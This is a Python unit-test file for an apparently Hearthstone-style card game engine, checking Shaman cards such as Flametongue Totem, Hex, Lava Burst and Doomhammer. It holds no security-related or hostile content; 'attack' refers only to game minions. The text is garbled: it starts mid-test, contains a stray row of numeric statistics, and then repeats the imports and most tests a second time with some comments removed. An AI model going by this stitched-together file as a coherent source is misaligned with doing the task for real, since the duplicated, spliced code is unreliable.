# The attack of the boar which used to be next to the wolf should decrease
boar = StonetuskBoar()
boar.summon(game.players[0], game, 0)
boar.summon(game.players[0], game, 2)
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[2].calculate_attack())
self.assertEqual(1, game.players[0].minions[3].calculate_attack())
# Add a new boar on the left of the totem since we haven't tested that yet
boar.summon(game.players[0], game, 1)
self.assertEqual(5, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[1].calculate_attack())
game.players[0].minions[1].die(None)
game.players[0].minions[1].activate_delayed()
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[0].calculate_attack())
# If the totem is silenced, then the boars to either side should no longer have increased attack
game.players[0].minions[1].silence()
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
self.assertEqual(1, game.players[0].minions[2].calculate_attack())
self.assertEqual(1, game.players[0].minions[3].calculate_attack())
def test_ManaTideTotem(self):
game = generate_game_for([ManaTideTotem, WarGolem], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(25, game.players[0].deck.left)
self.assertEqual(0, len(game.players[0].minions))
# Mana Tide Totem should be played, and we should draw a card at the end of turn
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Mana Tide Totem", game.players[0].minions[0].card.name)
self.assertEqual(23, game.players[0].deck.left)
game.play_single_turn()
# Silence, we should only draw one card next turn
game.players[0].minions[0].silence()
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(22, game.players[0].deck.left)
def test_UnboundElemental(self):
game = generate_game_for([UnboundElemental, DustDevil, DustDevil], StonetuskBoar, OneCardPlayingAgent,
DoNothingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Unbound Elemental", game.players[0].minions[0].card.name)
self.assertEqual(2, game.players[0].minions[0].calculate_attack())
self.assertEqual(4, game.players[0].minions[0].calculate_max_health())
# One Dust Devil should be played, giving the Unbound Elemental +1/+1
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[-1].calculate_attack())
self.assertEqual(5, game.players[0].minions[-1].calculate_max_health())
# Test the silence
game.players[0].minions[-1].silence()
self.assertEqual(2, game.players[0].minions[-1].calculate_attack())
self.assertEqual(4, game.players[0].minions[-1].calculate_max_health())
# Another Dust Devil, nothing should happen because of silence
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(2, game.players[0].minions[-1].calculate_attack())
self.assertEqual(4, game.players[0].minions[-1].calculate_max_health())
def test_Windspeaker(self):
game = generate_game_for([StonetuskBoar, Windspeaker], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Stonetusk Boar", game.players[0].minions[0].card.name)
self.assertFalse(game.players[0].minions[0].windfury())
# Windspeaker should be played, giving the boar windfury
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual("Windspeaker", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[1].windfury())
def test_AncestralHealing(self):
game = generate_game_for([FlametongueTotem, AncestralHealing], StonetuskBoar,
OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Flametongue Totem", game.players[0].minions[0].card.name)
self.assertEqual(3, game.players[0].minions[0].health)
self.assertFalse(game.players[0].minions[0].taunt)
game.players[0].minions[0].health = 1
game.play_single_turn()
self.assertEqual(3, game.players[0].minions[0].health)
self.assertTrue(game.players[0].minions[0].taunt)
def test_AncestralSpirit(self):
game = generate_game_for([ArgentCommander, AncestralSpirit], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 11):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Argent Commander", game.players[0].minions[0].card.name)
self.assertEqual(2, game.players[0].minions[0].health)
self.assertTrue(game.players[0].minions[0].divine_shield)
game.play_single_turn()
# Ancestral Spirit should be played on the Argent Commander
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
game.players[0].minions[0].health = 1
game.players[0].minions[0].divine_shield = False
# Let the minion die in order to test Ancestral Spirit
commander = game.players[0].minions[0]
commander.die(None)
commander.activate_delayed()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Argent Commander", game.players[0].minions[0].card.name)
self.assertEqual(2, game.players[0].minions[0].health)
self.assertTrue(game.players[0].minions[0].divine_shield)
def test_AncestralSpiritDeathrattle(self):
game = generate_game_for([LootHoarder, AncestralSpirit], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(4, len(game.players[0].hand))
loot = game.players[0].minions[0]
loot.die(None)
loot.activate_delayed()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(5, len(game.players[0].hand))
def test_Bloodlust(self):
game = generate_game_for([StonetuskBoar, StonetuskBoar, StonetuskBoar, StonetuskBoar, Bloodlust], StonetuskBoar,
MinionAttackingAgent, DoNothingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(20, game.players[1].hero.health)
# Bloodlust should be played, resulting in 4 * 4 = 16 damage
game.play_single_turn()
self.assertEqual(4, game.players[1].hero.health)
# Attack power should be back to normal
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
def test_EarthShock(self):
game = generate_game_for(EarthShock, ArgentSquire, OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(0, 2):
game.play_single_turn()
self.assertEqual(1, len(game.players[1].minions))
self.assertTrue(game.players[1].minions[0].divine_shield)
# Earth Shock should be played, resulting in silence which removes the divine shield and then 1 damage
game.play_single_turn()
self.assertEqual(0, len(game.players[1].minions))
def test_FarSight(self):
game = generate_game_for(FarSight, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
# Far Sight should have been played, our latest card should cost 3 - 3 = 0
self.assertEqual(0, game.players[0].hand[-1].mana_cost())
self.assertEqual(3, game.players[0].hand[0].mana_cost())
# Draw a card to make sure the new card doesn't get the effect
game.players[0].draw()
self.assertEqual(3, game.players[0].hand[-1].mana_cost())
# Our old card shouldn't have been affected
self.assertEqual(0, game.players[0].hand[-2].mana_cost())
def test_FeralSpirit(self):
game = generate_game_for(FeralSpirit, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(2, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[0].health)
self.assertTrue(game.players[0].minions[0].taunt)
self.assertEqual("Spirit Wolf", game.players[0].minions[0].card.name)
self.assertEqual(2, game.players[0].minions[0].card.mana)
self.assertEqual(2, game.players[0].minions[1].calculate_attack())
self.assertEqual(3, game.players[0].minions[1].health)
self.assertTrue(game.players[0].minions[1].taunt)
self.assertEqual("Spirit Wolf", game.players[0].minions[1].card.name)
self.assertEqual(2, game.players[0].minions[1].card.mana)
self.assertEqual(2, game.players[0].upcoming_overload)
def test_VitalityTotem(self):
game = generate_game_for(VitalityTotem, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 2):
game.play_single_turn()
game.players[0].hero.health = 20
game.play_single_turn()
game.play_single_turn()
self.assertEqual(24, game.players[0].hero.health)
self.assertEqual(0, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
# player now has two vitality totems in play
self.assertEqual(30, game.players[0].hero.health)
self.assertEqual(2, len(game.players[0].minions))
def test_ForkedLightning(self):
game = generate_game_for(ForkedLightning, StonetuskBoar, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 4):
game.play_single_turn()
# Nothing should have happened yet, since the opponent haven't got 2 minions until now
self.assertEqual(2, len(game.players[1].minions))
# Forked Lightning should be played
game.play_single_turn()
self.assertEqual(0, len(game.players[1].minions))
self.assertEqual(2, game.players[0].upcoming_overload)
def test_FrostShock(self):
game = generate_game_for(FrostShock, StonetuskBoar, CardTestingAgent, DoNothingAgent)
# Frost Shock should be played
game.play_single_turn()
self.assertEqual(29, game.players[1].hero.health)
self.assertTrue(game.players[1].hero.frozen)
def test_Hex(self):
game = generate_game_for(ChillwindYeti, Hex, OneCardPlayingAgent, CardTestingAgent)
for turn in range(0, 7):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertFalse(game.players[0].minions[0].taunt)
self.assertEqual(4, game.players[0].minions[0].calculate_attack())
self.assertEqual(5, game.players[0].minions[0].health)
self.assertEqual("Chillwind Yeti", game.players[0].minions[0].card.name)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertTrue(game.players[0].minions[0].taunt)
self.assertEqual(0, game.players[0].minions[0].calculate_attack())
self.assertEqual(1, game.players[0].minions[0].health)
self.assertEqual("Frog", game.players[0].minions[0].card.name)
self.assertEqual(MINION_TYPE.BEAST, game.players[0].minions[0].card.minion_type)
def test_LavaBurst(self):
game = generate_game_for(LavaBurst, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(30, game.players[1].hero.health)
game.play_single_turn()
self.assertEqual(25, game.players[1].hero.health)
self.assertEqual(2, game.players[0].upcoming_overload)
def test_LightningBolt(self):
game = generate_game_for(LightningBolt, StonetuskBoar, CardTestingAgent, DoNothingAgent)
self.assertEqual(30, game.players[1].hero.health)
game.play_single_turn()
self.assertEqual(27, game.players[1].hero.health)
self.assertEqual(1, game.players[0].upcoming_overload)
def test_LightningStorm(self):
game = generate_game_for(LightningStorm, Shieldbearer, CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 4):
game.play_single_turn()
# Lightning Storm should be played
game.play_single_turn()
self.assertEqual(3, len(game.players[1].minions))
self.assertEqual(1, game.players[1].minions[0].health)
self.assertEqual(2, game.players[1].minions[1].health)
self.assertEqual(2, game.players[1].minions[2].health)
self.assertEqual(2, game.players[0].upcoming_overload)
def test_RockbiterWeapon(self):
game = generate_game_for(RockbiterWeapon, Shieldbearer, PlayAndAttackAgent, DoNothingAgent)
self.assertEqual(30, game.players[1].hero.health)
# Rockbiter Weapon should be played and used
game.play_single_turn()
self.assertEqual(27, game.players[1].hero.health)
def test_RockbiterWeapon_and_Hex(self):
game = generate_game_for([IronfurGrizzly, RockbiterWeapon, Hex], StonetuskBoar,
CardTestingAgent, DoNothingAgent)
for turn in range(7):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Frog", game.current_player.minions[0].card.name)
def test_RockbiterWeapon_and_BaronGeddon(self):
game = generate_game_for([BaronGeddon, RecklessRocketeer, RockbiterWeapon], StonetuskBoar,
PlayAndAttackAgent, DoNothingAgent)
for turn in range(15):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Baron Geddon", game.current_player.minions[0].card.name)
self.assertEqual(11, game.other_player.hero.health)
def test_TotemicMight(self):
game = generate_game_for([TotemicMight, StonetuskBoar], Shieldbearer, PredictableAgent, DoNothingAgent)
for turn in range(0, 2):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Stonetusk Boar", game.players[0].minions[0].card.name)
# Hero power and Totemic Might should be played
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].calculate_max_health())
self.assertEqual("Stoneclaw Totem", game.players[0].minions[1].card.name)
self.assertEqual(4, game.players[0].minions[1].calculate_max_health())
def test_Windfury(self):
game = generate_game_for(Windfury, StonetuskBoar, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 2):
game.play_single_turn()
self.assertFalse(game.players[1].minions[0].windfury())
# Windfury should be played
game.play_single_turn()
self.assertTrue(game.players[1].minions[0].windfury())
def test_Doomhammer(self):
game = generate_game_for(Doomhammer, StonetuskBoar, PlayAndAttackAgent, DoNothingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(30, game.players[1].hero.health)
self.assertFalse(game.players[0].hero.windfury())
# Doomhammer should be played
game.play_single_turn()
self.assertTrue(game.players[0].hero.windfury())
self.assertEqual(2, game.players[0].weapon.base_attack)
self.assertEqual(6, game.players[0].weapon.durability)
self.assertEqual(2, game.players[0].upcoming_overload)
self.assertEqual(26, game.players[1].hero.health)
def test_StormforgedAxe(self):
game = generate_game_for(StormforgedAxe, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(2, game.players[0].weapon.base_attack)
self.assertEqual(3, game.players[0].weapon.durability)
self.assertEqual(1, game.players[0].upcoming_overload)
def test_Crackle(self):
game = generate_game_for(Crackle, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(25, game.players[1].hero.health)
self.assertEqual(1, game.players[0].upcoming_overload)
def test_SiltfinSpiritwalker(self):
game = generate_game_for([MurlocTidecaller, MurlocTidehunter, SiltfinSpiritwalker, Deathwing],
[MurlocTidecaller, Hellfire, BaneOfDoom], OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(6):
game.play_single_turn()
self.assertEqual(3, len(game.other_player.minions))
self.assertEqual(1, len(game.current_player.minions))
# Play Siltfin
game.play_single_turn()
self.assertEqual(4, len(game.current_player.minions))
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(4, len(game.current_player.hand))
self.assertEqual(7, len(game.other_player.hand))
# Hellfire will kill all the murlocs but the siltfin.
game.play_single_turn()
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(7, len(game.other_player.hand))
self.assertEqual(0, len(game.current_player.minions))
self.assertEqual(7, len(game.current_player.hand))
def test_WhirlingZapOMatic(self):
game = generate_game_for(WhirlingZapomatic, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Whirling Zap-o-matic", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[0].windfury())
def test_DunemaulShaman(self):
game = generate_game_for(DunemaulShaman,
[StonetuskBoar, GoldshireFootman, SilverbackPatriarch, MogushanWarden],
PlayAndAttackAgent, OneCardPlayingAgent)
for turn in range(7):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(3, len(game.other_player.minions))
game.play_single_turn()
# The shaman's forgetful ability triggers once. It hits the warden one time (its intended target)
# and the footman one time (after triggering forgetful)
game.play_single_turn()
self.assertEqual(2, len(game.current_player.minions))
self.assertEqual(3, len(game.other_player.minions))
self.assertEqual("Mogu'shan Warden", game.other_player.minions[0].card.name)
self.assertEqual("Silverback Patriarch", game.other_player.minions[1].card.name)
self.assertEqual("Stonetusk Boar", game.other_player.minions[2].card.name)
self.assertEqual(30, game.other_player.hero.health)
def test_Powermace(self):
game = generate_game_for([Powermace, SpiderTank, SpiderTank], Wisp, PlayAndAttackAgent, DoNothingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(0, len(game.players[0].minions))
self.assertEqual(27, game.players[1].hero.health)
self.assertEqual(3, game.players[0].weapon.base_attack)
self.assertEqual(1, game.players[0].weapon.durability)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(24, game.players[1].hero.health)
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
def test_Neptulon(self):
game = generate_game_for([TheCoin, TheCoin, TheCoin, TheCoin, TheCoin, TheCoin, TheCoin, TheCoin, TheCoin,
Neptulon], Wisp, CardTestingAgent, DoNothingAgent)
for turn in range(0, 12):
game.play_single_turn()
self.assertEqual(0, len(game.players[0].minions))
self.assertEqual(0, len(game.players[0].hand))
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(4, len(game.players[0].hand))
for card in game.players[0].hand:
self.assertEqual(MINION_TYPE.MURLOC, card.minion_type)
def test_AncestorsCall(self):
game = generate_game_for([AncestorsCall, StonetuskBoar], [Doomguard, Soulfire],
OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(6):
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Stonetusk Boar", game.current_player.minions[0].card.name)
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual("Doomguard", game.other_player.minions[0].card.name)
self.assertEqual(5, len(game.current_player.hand))
self.assertEqual(7, len(game.other_player.hand))
def test_LavaShock(self):
game = generate_game_for([Doomhammer, LightningBolt, LavaShock], StonetuskBoar,
CardTestingAgent, DoNothingAgent)
for turn in range(11):
game.play_single_turn()
# The player should have been able to do everything AND have three mana left over
self.assertEqual(25, game.other_player.hero.health)
self.assertEqual(3, game.current_player.mana)
def test_FireguardDestroyer(self):
game = generate_game_for(FireguardDestroyer, Wisp, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(6, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(5, len(game.players[0].minions))
self.assertEqual(6, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(6, len(game.players[0].minions))
self.assertEqual(4, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(7, len(game.players[0].minions)) # Well, I was trying to get a 7/6 but no luck
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertEqual(6, game.players[0].minions[0].health)
def test_AncestralKnowledge(self):
game = generate_game_for(AncestralKnowledge, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(6, len(game.current_player.hand))
self.assertEqual(2, game.current_player.upcoming_overload)
| 43.097842
| 120
| 0.672988
|
import random
import unittest
from SDWLE.cards.spells.neutral import TheCoin
from testsSDW.agents.testing_agents import OneCardPlayingAgent, MinionAttackingAgent, CardTestingAgent, \
PlayAndAttackAgent
from testsSDW.testing_utils import generate_game_for
from SDWLE.cards import *
from SDWLE.constants import MINION_TYPE
from SDWLE.agents.basic_agents import PredictableAgent, DoNothingAgent
class TestShaman(unittest.TestCase):
def setUp(self):
random.seed(1857)
def test_AlAkirTheWindlord(self):
game = generate_game_for(AlAkirTheWindlord, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 15):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Al'Akir the Windlord", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[0].windfury())
self.assertTrue(game.players[0].minions[0].charge())
self.assertTrue(game.players[0].minions[0].divine_shield)
self.assertTrue(game.players[0].minions[0].taunt)
def test_DustDevil(self):
game = generate_game_for(DustDevil, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Dust Devil", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[0].windfury())
self.assertEqual(2, game.players[0].upcoming_overload)
game.play_single_turn()
# Overload should cause that we start this turn with 0 mana
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(0, game.players[0].upcoming_overload)
self.assertEqual(0, game.players[0].mana)
self.assertEqual(2, game.players[0].max_mana)
def test_EarthElemental(self):
game = generate_game_for(EarthElemental, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
# Earth Elemental should be played
for turn in range(0, 9):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Earth Elemental", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[0].taunt)
self.assertEqual(3, game.players[0].upcoming_overload)
def test_FireElemental(self):
game = generate_game_for(FireElemental, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 10):
game.play_single_turn()
self.assertEqual(30, game.players[1].hero.health)
# Fire Elemental should be played, and its battlecry dealing three damage to opponent
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Fire Elemental", game.players[0].minions[0].card.name)
self.assertEqual(27, game.players[1].hero.health)
def test_FlametongueTotem(self):
game = generate_game_for(StonetuskBoar, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
# There should be three Stonetusk Boars on the board
self.assertEqual(3, len(game.players[0].minions))
# add a new Flametongue Totem at index 1
totem = FlametongueTotem()
totem.summon(game.players[0], game, 1)
# The minions to either side should have their attack increased
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[2].calculate_attack())
self.assertEqual(1, game.players[0].minions[3].calculate_attack())
# When removing the minion at index 0, we should not get an error
game.players[0].minions[0].die(None)
game.players[0].minions[0].activate_delayed()
self.assertEqual(3, len(game.players[0].minions))
# When removing the minion at index 1, we should have a new minion at index 1,
# and its attack should be increased
game.players[0].minions[1].die(None)
game.players[0].minions[1].activate_delayed()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[1].calculate_attack())
# Silencing this minion should have no effect on its attack
game.players[0].minions[1].silence()
self.assertEqual(3, game.players[0].minions[1].calculate_attack())
# We should be able to add a boar on either side of the wolf, and their attack should be increased
# The attack of the boar which used to be next to the wolf should decrease
boar = StonetuskBoar()
boar.summon(game.players[0], game, 0)
boar.summon(game.players[0], game, 2)
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[2].calculate_attack())
self.assertEqual(1, game.players[0].minions[3].calculate_attack())
# Add a new boar on the left of the totem since we haven't tested that yet
boar.summon(game.players[0], game, 1)
self.assertEqual(5, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[1].calculate_attack())
game.players[0].minions[1].die(None)
game.players[0].minions[1].activate_delayed()
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[0].calculate_attack())
game.players[0].minions[1].silence()
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
self.assertEqual(1, game.players[0].minions[2].calculate_attack())
self.assertEqual(1, game.players[0].minions[3].calculate_attack())
def test_ManaTideTotem(self):
game = generate_game_for([ManaTideTotem, WarGolem], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(25, game.players[0].deck.left)
self.assertEqual(0, len(game.players[0].minions))
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Mana Tide Totem", game.players[0].minions[0].card.name)
self.assertEqual(23, game.players[0].deck.left)
game.play_single_turn()
game.players[0].minions[0].silence()
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(22, game.players[0].deck.left)
def test_UnboundElemental(self):
game = generate_game_for([UnboundElemental, DustDevil, DustDevil], StonetuskBoar, OneCardPlayingAgent,
DoNothingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Unbound Elemental", game.players[0].minions[0].card.name)
self.assertEqual(2, game.players[0].minions[0].calculate_attack())
self.assertEqual(4, game.players[0].minions[0].calculate_max_health())
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[-1].calculate_attack())
self.assertEqual(5, game.players[0].minions[-1].calculate_max_health())
game.players[0].minions[-1].silence()
self.assertEqual(2, game.players[0].minions[-1].calculate_attack())
self.assertEqual(4, game.players[0].minions[-1].calculate_max_health())
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(2, game.players[0].minions[-1].calculate_attack())
self.assertEqual(4, game.players[0].minions[-1].calculate_max_health())
def test_Windspeaker(self):
game = generate_game_for([StonetuskBoar, Windspeaker], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Stonetusk Boar", game.players[0].minions[0].card.name)
self.assertFalse(game.players[0].minions[0].windfury())
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual("Windspeaker", game.players[0].minions[0].card.name)
self.assertTrue(game.players[0].minions[1].windfury())
def test_AncestralHealing(self):
game = generate_game_for([FlametongueTotem, AncestralHealing], StonetuskBoar,
OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Flametongue Totem", game.players[0].minions[0].card.name)
self.assertEqual(3, game.players[0].minions[0].health)
self.assertFalse(game.players[0].minions[0].taunt)
game.players[0].minions[0].health = 1
game.play_single_turn()
self.assertEqual(3, game.players[0].minions[0].health)
self.assertTrue(game.players[0].minions[0].taunt)
def test_AncestralSpirit(self):
game = generate_game_for([ArgentCommander, AncestralSpirit], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 11):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Argent Commander", game.players[0].minions[0].card.name)
self.assertEqual(2, game.players[0].minions[0].health)
self.assertTrue(game.players[0].minions[0].divine_shield)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
game.players[0].minions[0].health = 1
game.players[0].minions[0].divine_shield = False
commander = game.players[0].minions[0]
commander.die(None)
commander.activate_delayed()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Argent Commander", game.players[0].minions[0].card.name)
self.assertEqual(2, game.players[0].minions[0].health)
self.assertTrue(game.players[0].minions[0].divine_shield)
def test_AncestralSpiritDeathrattle(self):
game = generate_game_for([LootHoarder, AncestralSpirit], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(4, len(game.players[0].hand))
loot = game.players[0].minions[0]
loot.die(None)
loot.activate_delayed()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(5, len(game.players[0].hand))
def test_Bloodlust(self):
game = generate_game_for([StonetuskBoar, StonetuskBoar, StonetuskBoar, StonetuskBoar, Bloodlust], StonetuskBoar,
MinionAttackingAgent, DoNothingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual(20, game.players[1].hero.health)
game.play_single_turn()
self.assertEqual(4, game.players[1].hero.health)
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
def test_EarthShock(self):
game = generate_game_for(EarthShock, ArgentSquire, OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(0, 2):
game.play_single_turn()
self.assertEqual(1, len(game.players[1].minions))
self.assertTrue(game.players[1].minions[0].divine_shield)
game.play_single_turn()
self.assertEqual(0, len(game.players[1].minions))
def test_FarSight(self):
game = generate_game_for(FarSight, StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(0, game.players[0].hand[-1].mana_cost())
self.assertEqual(3, game.players[0].hand[0].mana_cost())
game.players[0].draw()
self.assertEqual(3, game.players[0].hand[-1].mana_cost())
# Our old card shouldn't have been affected
self.assertEqual(0, game.players[0].hand[-2].mana_cost())
def test_FeralSpirit(self):
game = generate_game_for(FeralSpirit, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(2, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[0].health)
self.assertTrue(game.players[0].minions[0].taunt)
self.assertEqual("Spirit Wolf", game.players[0].minions[0].card.name)
self.assertEqual(2, game.players[0].minions[0].card.mana)
self.assertEqual(2, game.players[0].minions[1].calculate_attack())
self.assertEqual(3, game.players[0].minions[1].health)
self.assertTrue(game.players[0].minions[1].taunt)
self.assertEqual("Spirit Wolf", game.players[0].minions[1].card.name)
self.assertEqual(2, game.players[0].minions[1].card.mana)
self.assertEqual(2, game.players[0].upcoming_overload)
def test_VitalityTotem(self):
game = generate_game_for(VitalityTotem, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 2):
game.play_single_turn()
game.players[0].hero.health = 20
game.play_single_turn()
game.play_single_turn()
self.assertEqual(24, game.players[0].hero.health)
self.assertEqual(0, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(30, game.players[0].hero.health)
